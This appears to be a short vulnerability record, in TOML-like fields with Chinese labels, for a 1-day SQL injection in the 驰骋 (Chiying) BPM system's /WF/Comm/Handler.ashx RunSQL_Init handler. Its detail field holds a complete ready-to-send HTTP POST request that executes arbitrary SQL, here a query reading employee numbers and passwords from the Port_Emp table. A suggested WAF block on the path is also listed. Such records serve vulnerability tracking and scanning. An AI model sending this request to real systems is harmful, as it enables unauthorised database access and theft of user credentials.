vendor = "驰骋"
name = "驰骋BPM RunSQL_Init SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/WF/Comm/Handler.ashx"
detail = "POST /WF/Comm/Handler.ashx?DoType=RunSQL_Init HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----123128312312389898yd98ays98d ------123128312312389898yd98ays98d Content-Disposition: form-data; name=\"SQL\" SELECT No,Pass FROM Port_Emp ------123128312312389898yd98ays98d--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0809"
label = "1day"
